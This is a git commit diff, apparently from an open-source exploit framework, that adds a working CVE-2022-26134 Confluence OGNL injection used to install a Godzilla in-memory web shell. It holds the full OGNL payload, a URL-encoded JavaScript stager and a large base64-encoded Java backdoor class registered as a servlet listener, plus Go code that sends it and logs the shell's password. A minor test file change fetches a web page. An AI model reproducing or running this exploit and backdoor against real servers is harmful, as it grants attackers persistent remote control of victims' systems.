🪂 参考beichen实现CVE-2022-26134实现哥斯拉内存马注入

Author: SummerSec

cmd/commons/poc/2022/CVE-2022-26134.go

@@ -10,6 +10,9 @@ import (
 	log "github.com/sirupsen/logrus"
 )
 
+const beichen26134 = "${#a=new javax.script.ScriptEngineManager().getEngineByName(\"js\").eval(@com.opensymphony.webwork.ServletActionContext@getRequest().getParameter(\"search\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Status\",\"ok\"))}"
+const memshell26134 = "search=var+classBytes+%3D+java.util.Base64.getDecoder%28%29.decode%28%22yv66vgAAADQBjwoAaADRCgBoANIJAEwA0wkATADUCADVCgAMANYHANcIANgHANkKANoA2woA2gDcBwDdCgDeAN8KAEwA4AoATADhBwDiCADjCADkCgAMAOUHAOYKAOcA6AgA6QoATADqCADrCgBMAOwKABQA7QgA7goADADvCgDnAPAIAPEKAOcA8ggA8woALwD0CgBMAPUHAPYKACMA0goAIwD3CgAjAPgHAKkKAEwA%2BQoADAD6BwD7CgAMAPwKACoA8AoAKgD9CACxBwD%2BCAC1CAD%2FCgEAAQEHAQIJAEwBAwoALwEECgAzAQUKAQABBgoBAAEHCAEICgEJAQoKAC8BCwoBCQEMBwENCgEJAQ4KAD0BDwoAPQEQCgAvAREIARIKAEwBEwgBFAoALwEVCQBMARYKAEwBFwoBGAEZCgEaARsKAEwBHAkATAEdBwGNCgAMAR8KAEwA0QoATAEgBwEhCgBQANIKAAwBIgoAFAD0CgAUASMHASQKAFUA0goAVQElCgBVASMKAEwBJgoAUAEnCACJCADGCAEoBwEpCgAvASoKAF4BKwoBGAEsCgBQAS0KAS4BLwoALwEwCgBeATEKAF4BMgoAFADSBwEzBwE0AQALaW5pdGlhbGl6ZWQBAAFaAQAEbG9jawEAEkxqYXZhL2xhbmcvT2JqZWN0OwEADHBheWxvYWRDbGFzcwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAIcGFzc3dvcmQBABJMamF2YS9sYW5nL1N0cmluZzsBAANrZXkBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAPTG1haW4vTWVtU2hlbGw7AQAGbG9hZGVyAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAMoKVYBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAbc2VydmxldFJlcXVlc3RMaXN0ZW5lckNsYXNzAQANU3RhY2tNYXBUYWJsZQcBjQcA5gcA3QcA1wcA2QcA4gEAEmdldFN0YW5kYXJkQ29udGV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAHcmVxdWVzdAEADnNlcnZsZXRDb250ZXh0AQALYWRkTGlzdGVuZXIBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwEACGxpc3RlbmVyAQAPc3RhbmRhcmRDb250ZXh0AQAhYWRkQXBwbGljYXRpb25FdmVudExpc3RlbmVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAApFeGNlcHRpb25zAQAGaW52b2tlAQBTKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABNzZXJ2bGV0UmVxdWVzdEV2ZW50AQAFcHJveHkBAAZtZXRob2QBAARhcmdzAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEADGludm9rZU1ldGhvZAEASyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAAm8xAQABaQEAAUkBAAdjbGFzc2VzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQADb2JqAQAKbWV0aG9kTmFtZQEACnBhcmFtZXRlcnMHAPYHAP4HAJgBABBnZXRNZXRob2RCeUNsYXNzAQBRKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQACY3MBABJbTGphdmEvbGFuZy9DbGFzczsHATUBAA1nZXRGaWVsZFZhbHVlAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAAlmaWVsZE5hbWUBAAFmAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwcA%2BwEADGdldFBhcmFtZXRlcgEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQANcmVxdWVzdE9iamVjdAEABG5hbWUBAA5nZXRDb250ZW50VHlwZQEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9TdHJpbmc7AQADYWVzAQAHKFtCWilbQgEAAWMBABVMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAFzAQACW0IBAAFtBwC8BwE2AQADbWQ1AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEACGJhY2tEb29yAQAVKExqYXZhL2xhbmcvT2JqZWN0OylWAQAIcmVzcG9uc2UBAAtwcmludFdyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEABmFyck91dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAARkYXRhAQAFdmFsdWUBAAtjb250ZW50VHlwZQEACDxjbGluaXQ%2BAQAKU291cmNlRmlsZQEADU1lbVNoZWxsLmphdmEMAHMAdAwAcwB8DABsAG0MAGoAawEAJmpha2FydGEuc2VydmxldC5TZXJ2bGV0UmVxdWVzdExpc3RlbmVyDAE3ATgBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAkamF2YXguc2VydmxldC5TZXJ2bGV0UmVxdWVzdExpc3RlbmVyAQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24HATkMAToBOwwBPAE9AQAPamF2YS9sYW5nL0NsYXNzBwE%2BDAE%2FAUAMAIcAiAwAiwCMAQATamF2YS9sYW5nL1Rocm93YWJsZQEALWNvbS5vcGVuc3ltcGhvbnkud2Vid29yay5TZXJ2bGV0QWN0aW9uQ29udGV4dAEACmdldFJlcXVlc3QMAUEBQgEAEGphdmEvbGFuZy9PYmplY3QHATUMAJIBQwEAEWdldFNlcnZsZXRDb250ZXh0DACZAJoBAAdjb250ZXh0DACrAKwMAUQBRQEAG2FkZEFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcgwBRgFCDAFHAUgBAAJvawwBSQFKAQAScmVxdWVzdEluaXRpYWxpemVkDAFLAUwMAMQAxQEAE2phdmEvdXRpbC9BcnJheUxpc3QMAU0BTAwBTgFPDACmAKcMAVABRQEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkDAFRAVIMAVMBVAEAEGphdmEvbGFuZy9TdHJpbmcBAANBRVMHATYMAVUBVgEAH2phdmF4L2NyeXB0by9zcGVjL1NlY3JldEtleVNwZWMMAHIAcQwBVwFYDABzAVkMAVoBWwwBXAFdAQADTUQ1BwFeDAFVAV8MAWABYQwBYgFjAQAUamF2YS9tYXRoL0JpZ0ludGVnZXIMAWQBWAwAcwFlDAFmAWcMAWgBSgEAEWdldFNlcnZsZXRSZXF1ZXN0DAC1ALYBACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQMAWkBagwAcABxDACxALIHAWsMAWwBbwcBcAwBcQFyDAC3ALgMAG4AbwEADW1haW4vTWVtU2hlbGwMAXMBPQwBdAF1AQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0MAXYAiAwBZgFKAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMAXcBeAwAwADBDAF5AWEBAAlnZXRXcml0ZXIBABNqYXZhL2lvL1ByaW50V3JpdGVyDAF6AXsMAXwBfQwBfgGADAGBAVgHAYIMAYMBhAwBegFnDAGFAHwMAYYAfAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAI2phdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YXgvY3J5cHRvL0NpcGhlcgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABdqYXZhL2xhbmcvcmVmbGVjdC9Qcm94eQEAEG5ld1Byb3h5SW5zdGFuY2UBAGIoTGphdmEvbGFuZy9DbGFzc0xvYWRlcjtbTGphdmEvbGFuZy9DbGFzcztMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7KUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQADYWRkAQAHdG9BcnJheQEAKChbTGphdmEvbGFuZy9PYmplY3Q7KVtMamF2YS9sYW5nL09iamVjdDsBAA1nZXRTdXBlcmNsYXNzAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQALZ2V0SW5zdGFuY2UBACkoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEACGdldEJ5dGVzAQAEKClbQgEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAEaW5pdAEAFyhJTGphdmEvc2VjdXJpdHkvS2V5OylWAQAHZG9GaW5hbAEABihbQilbQgEAG2phdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdAEAMShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdDsBAAZsZW5ndGgBAAMoKUkBAAZ1cGRhdGUBAAcoW0JJSSlWAQAGZGlnZXN0AQAGKElbQilWAQAIdG9TdHJpbmcBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAt0b1VwcGVyQ2FzZQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldERlY29kZXIBAAdEZWNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCREZWNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRGVjb2RlcgEABmRlY29kZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAA5nZXRDbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsBAAtuZXdJbnN0YW5jZQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEABHNpemUBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQAFd3JpdGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAApnZXRFbmNvZGVyAQAHRW5jb2RlcgEAHCgpTGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcjsBAAt0b0J5dGVBcnJheQEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEABWZsdXNoAQAFY2xvc2UJAIEBFgEABHBhc3MIAYgJAIEBAwEAEDNjNmUwYjhhOWMxNTIyNGEIAYsBADdjb20vb3BlbnN5bXBob255L3h3b3JrL2I2OWE4MzdkODE4NjQ0YzU4OGJjM2VlNDgzMmRiYzQyAQA5TGNvbS9vcGVuc3ltcGhvbnkveHdvcmsvYjY5YTgzN2Q4MTg2NDRjNTg4YmMzZWU0ODMyZGJjNDI7ACEATABoAAEAaQAFAAoAagBrAAAACgBsAG0AAAAKAG4AbwAAAAoAcABxAAAACgByAHEAAAAOAAEAcwB0AAEAdQAAAD4AAgACAAAABiortwABsQAAAAIAdgAAAAoAAgAAABIABQATAHcAAAAWAAIAAAAGAHgBjgAAAAAABgB6AHsAAQABAHMAfAABAHUAAAFFAAYABgAAAFsqtwACsgADWUzCsgAEmgBBAU0SBbgABk2nAA9OEgi4AAZNpwAFOgQsxgAeKrgACrYACwS9AAxZAyxTKrgADSq3AA63AA9XpwAETQSzAAQrw6cACjoFK8MZBb%2BxAAUAEgAYABsABwAcACIAJQAJABAARgBJABAACgBQAFMAAABTAFcAUwAAAAMAdgAAAEYAEQAAABQABAAVAAoAFgAQABgAEgAaABgAIQAbABsAHAAdACIAIAAlAB4AJwAiACsAIwBGACcASQAlAEoAKABOACoAWgArAHcAAAAgAAMAHAALAH0AfgADABIANAB%2FAG8AAgAAAFsAeAGOAAAAgAAAAD4ACf8AGwADBwCBBwCCBwCDAAEHAIT%2FAAkABAcAgQcAggcAgwcAhAABBwCF%2BgAB%2BgAeQgcAhgADRAcAhvoABgACAIcAiAABAHUAAACeAAQAAwAAADISEbgABhISA70ADLYAEwEDvQAUtgAVTCorEhYDvQAUtwAXTSwSGLgAGRIYuAAZsEwBsAABAAAALgAvAAcAAwB2AAAAFgAFAAAAMAAXADEAIwAyAC8AMwAwADUAdwAAACoABAAXABgAiQBtAAEAIwAMAIoAbQACADAAAgB9AH4AAQAAADIAeAGOAAAAgAAAAAYAAW8HAIQAAgCLAIwAAgB1AAAAfQAGAAQAAAApLLYAGhIbBL0ADFkDEhRTtgAcTi0EtgAdLSwEvQAUWQMrU7YAFVcSHrAAAAACAHYAAAASAAQAAAA6ABMAOwAYADwAJgA9AHcAAAAqAAQAAAApAHgBjgAAAAAAKQCNAG0AAQAAACkAjgBtAAIAEwAWAI8AkAADAJEAAAAEAAEABwABAJIAkwACAHUAAACAAAIABQAAABkstgAfEiC2ACGZAA4tAzI6BCoZBLcAIgGwAAAAAwB2AAAAEgAEAAAAQgAMAEMAEQBEABcARgB3AAAANAAFABEABgCUAG0ABAAAABkAeAGOAAAAAAAZAJUAbQABAAAAGQCWAJAAAgAAABkAlwCYAAMAgAAAAAMAARcAkQAAAAQAAQAQAIIAmQCaAAEAdQAAATgABQAHAAAAY7sAI1m3ACQ6BC3GADMDNgUVBS2%2BogApLRUFMjoGGQbGABEZBBkGtgAatgAlV6cAChkEAbYAJVeEBQGn%2F9YqK7YAGiwZBAO9AAy2ACbAACfAACe3ACg6BRkFKy22ABWwOgQBsAABAAAAXgBfAAcAAwB2AAAAMgAMAAAASwAJAEwADQBNABcATgAdAE8AIgBQADAAUgA3AE0APQBWAFcAWABfAFkAYQBcAHcAAABSAAgAHQAaAJsAbQAGABAALQCcAJ0ABQAJAFYAngCfAAQAVwAIAJYAkAAFAAAAYwB4AY4AAAAAAGMAoABtAAEAAABjAKEAcQACAAAAYwCiAJgAAwCAAAAAKwAF%2FQAQBwCjAfwAHwcAgvoABvoABf8AIQAEBwCBBwCCBwCkBwClAAEHAIQAggCmAKcAAQB1AAAAuAADAAYAAAAhAToEK8YAGissLbYAEzoEAUyn%2F%2FI6BSu2AClMp%2F%2FoGQSwAAEABwARABQABwADAHYAAAAmAAkAAABfAAMAYAAHAGIADwBjABEAZgAUAGQAFgBlABsAZgAeAGgAdwAAAD4ABgAWAAUAfQB%2BAAUAAAAhAHgBjgAAAAAAIQCoAG8AAQAAACEAoQBxAAIAAAAhAKIAqQADAAMAHgCWAJAABACAAAAADQAD%2FAADBwCqUAcAhAkACQCrAKwAAgB1AAAA%2BAACAAYAAABCAU0qwQAqmQALKsAAKk2nACkBTiq2ABo6BBkExgAcGQQrtgArTQE6BKf%2F8ToFGQS2ACk6BKf%2F5SwEtgAsLCq2AC2wAAEAHgAoACsABwADAHYAAAA6AA4AAABrAAIAbAAJAG0AEQBvABMAcAAZAHEAHgBzACUAdAAoAHcAKwB1AC0AdgA0AHcANwB6ADwAewB3AAAAPgAGAC0ABwB9AH4ABQATACQAlgCQAAMAGQAeAKgAbwAEAAAAQgCgAG0AAAAAAEIArQBxAAEAAgBAAK4ArwACAIAAAAAYAAT8ABEHALD9AAcHAKoHAINRBwCE%2BQALAJEAAAAEAAEABwABALEAsgABAHUAAABRAAcAAwAAABMqKxIuBL0AFFkDLFO3ABfAAC%2BwAAAAAgB2AAAABgABAAAAfgB3AAAAIAADAAAAEwB4AY4AAAAAABMAswBtAAEAAAATALQAcQACAAEAtQC2AAEAdQAAAEMABAACAAAADyorEjADvQAUtwAXwAAvsAAAAAIAdgAAAAYAAQAAAIEAdwAAABYAAgAAAA8AeAGOAAAAAAAPALMAbQABAAEAtwC4AAEAdQAAANcABgAEAAAAKxIxuAAyTi0cmQAHBKcABAW7ADNZsgA0tgA1EjG3ADa2ADctK7YAOLBOAbAAAQAAACcAKAAHAAMAdgAAABYABQAAAIcABgCIACIAiQAoAIoAKQCLAHcAAAA0AAUABgAiALkAugADACkAAgB9AH4AAwAAACsAeAGOAAAAAAArALsAvAABAAAAKwC9AGsAAgCAAAAAPAAD%2FwAPAAQHAIEHAL4BBwC%2FAAEHAL%2F%2FAAAABAcAgQcAvgEHAL8AAgcAvwH%2FABcAAwcAgQcAvgEAAQcAhAAJAMAAwQABAHUAAACPAAQAAwAAADABTBI5uAA6TSwqtgA1Ayq2ADu2ADy7AD1ZBCy2AD63AD8QELYAQLYAQUynAARNK7AAAQACACoALQAHAAMAdgAAAAYAAQAAAI8AdwAAACAAAwAIACIAvQDCAAIAAAAwALsAcQAAAAIALgDDAHEAAQCAAAAAEwAC%2FwAtAAIHAKQHAKQAAQcAhAAAAgDEAMUAAQB1AAACYQAFAAsAAAEfKisSQgO9ABS3ABdNKiy2AENOLcYBAy0SRLYARZkA%2BiossgBGtgBHOgQZBMYA67gASBkEtgBJOgUqGQUDtgBKOgUZBcYA0xkFvp4AzbIAS8cAILsATFkstgAatgBNtwBOGQUDGQW%2BtgBPswBLpwCquwBQWbcAUToGsgBLtgBSOgcZBxkGtgBTVxkHLLYAU1cZBxkFtgBTVxkHtgBUV7sAVVm3AFayAEa2AFeyADS2AFe2AFi4AFk6CBkGtgBangBZLBJbuAAZEly4ABk6CSoZCRJdA70AFLcAF8AAXjoKGQoZCAMQELYAX7YAYBkKuABhKhkGtgBiBLYASrYAY7YAYBkKGQgQELYAZLYAYBkKtgBlGQq2AGanAAROpwAETbEAAgAMARYBGQAQAAABGgEdAAcAAwB2AAAAegAeAAAAkwAMAJcAEgCYAB8AmQApAJoALgCbADgAnABBAJ0ATACeAFIAnwBvAKEAeACiAIAAowCIAKQAjwClAJcApgCdAKcAuACoAMAAqQDNAKoA3gCrAOsArAEAAK0BDACuAREArwEWALcBGQC2ARoAuwEdALkBHgC8AHcAAABwAAsAzQBJAMYAbQAJAN4AOADHAMgACgB4AJ4AyQDKAAYAgACWAK4AbQAHALgAXgDAAHEACAA4AN4AywC8AAUAKQDtAMwAcQAEABIBBADNAHEAAwAMAQ4AiQBtAAIAAAEfAHgBjgAAAAABHwCUAG0AAQCAAAAAKgAG%2FwBvAAYHAIEHAIIHAIIHAKQHAKQHAL4AAPgApkIHAIb6AABCBwCEAAAIAM4AfAABAHUAAAA3AAIAAAAAABsTAYmzAYcTAYyzAYoDswAEuwAUWbcAZ7MAA7EAAAABAHYAAAAKAAIADAAMABAADQACAM8AAAACANABbgAAABIAAgEaARgBbQAJAS4BGAF%2FAAk%3D%22%29%3B%0D%0Avar+loader+%3D+java.lang.Thread.currentThread%28%29.getContextClassLoader%28%29%3B%0D%0Avar+reflectUtilsClass+%3D+java.lang.Class.forName%28%22org.springframework.cglib.core.ReflectUtils%22%2Ctrue%2Cloader%29%3B%0D%0Avar+urls+%3D+java.lang.reflect.Array.newInstance%28java.lang.Class.forName%28%22java.net.URL%22%29%2C0%29%3B%0D%0A%0D%0Avar+params+%3D+java.lang.reflect.Array.newInstance%28java.lang.Class.forName%28%22java.lang.Class%22%29%2C3%29%3B%0D%0Aparams%5B0%5D+%3D+java.lang.Class.forName%28%22java.lang.String%22%29%3B%0D%0Aparams%5B1%5D+%3D+java.lang.Class.forName%28%22%5BB%22%29%3B%0D%0Aparams%5B2%5D+%3D+java.lang.Class.forName%28%22java.lang.ClassLoader%22%29%3B%0D%0A%0D%0A%0D%0Avar+defineClassMethod+%3D+reflectUtilsClass.getMethod%28%22defineClass%22%2Cparams%29%3B%0D%0A%0D%0Aparams+%3D++java.lang.reflect.Array.newInstance%28java.lang.Class.forName%28%22java.lang.Object%22%29%2C3%29%3B%0D%0A%0D%0Aparams%5B0%5D+%3D+%22com.opensymphony.xwork.b69a837d818644c588bc3ee4832dbc42%22%3B%0D%0Aparams%5B1%5D+%3D+classBytes%3B%0D%0Aparams%5B2%5D+%3D+loader%3B%0D%0AdefineClassMethod.invoke%28null%2Cparams%29.newInstance%28%29%3B%0D%0A%22ok%22%3B%0D%0A"
+
 type CVE202226134 struct{}
 
 func (t CVE202226134) SendPoc(target string, hashmap map[string]interface{}) {
@@ -59,6 +62,17 @@ func (t CVE202226134) SendPoc(target string, hashmap map[string]interface{}) {
 		}
 	}
 
+	reqmap["method"] = "POST"
+	temp, _ := req2.Encode(beichen26134, "utf8")
+	reqmap["url"] = target + temp + "/"
+	reqmap["body"] = memshell26134
+	resp1 := utils.Send(reqmap)
+	isok := resp2.HandlerRespHeader(resp1, "X-Status")
+	if isok != "" {
+		result := fmt.Sprintf("%s 注入哥斯拉内存马成功，密码 pass key 哥斯拉如果连接不上请添加请求头 Connection: close 参考https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL ")
+		t.SaveResult(result, hashmap["Out"].(string))
+	}
+
 }
 
 func (CVE202226134) SaveResult(target string, file string) {

cmd/test/copymap.go

@@ -2,13 +2,21 @@ package main
 
 import (
 	"fmt"
-	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
+	"github.com/imroc/req/v3"
+	log "github.com/sirupsen/logrus"
+	"time"
 )
 
 func main() {
-	encode, err := req2.Encode("${(#[email protected]@toString(@jav", "utf8")
-	if err != nil {
-		return
-	}
-	fmt.Println(encode)
+
+	rsp := req.C().SetRedirectPolicy(req.NoRedirectPolicy()).SetTimeout(3 * time.Second).EnableDebugLog()
+	rsp.SetLogger(log.StandardLogger())
+	rsp.EnableInsecureSkipVerify()
+	resp, _ := rsp.R().Send("GET", "https://sumsec.me/ads.txt")
+	resp.IsSuccess()
+	fmt.Println(resp.StatusCode)
+	fmt.Println(resp.Header.Values("Content-Type"))
+	fmt.Println(resp.Header.Get("Content-Type"))
+	fmt.Println(resp.Dump())
+
 }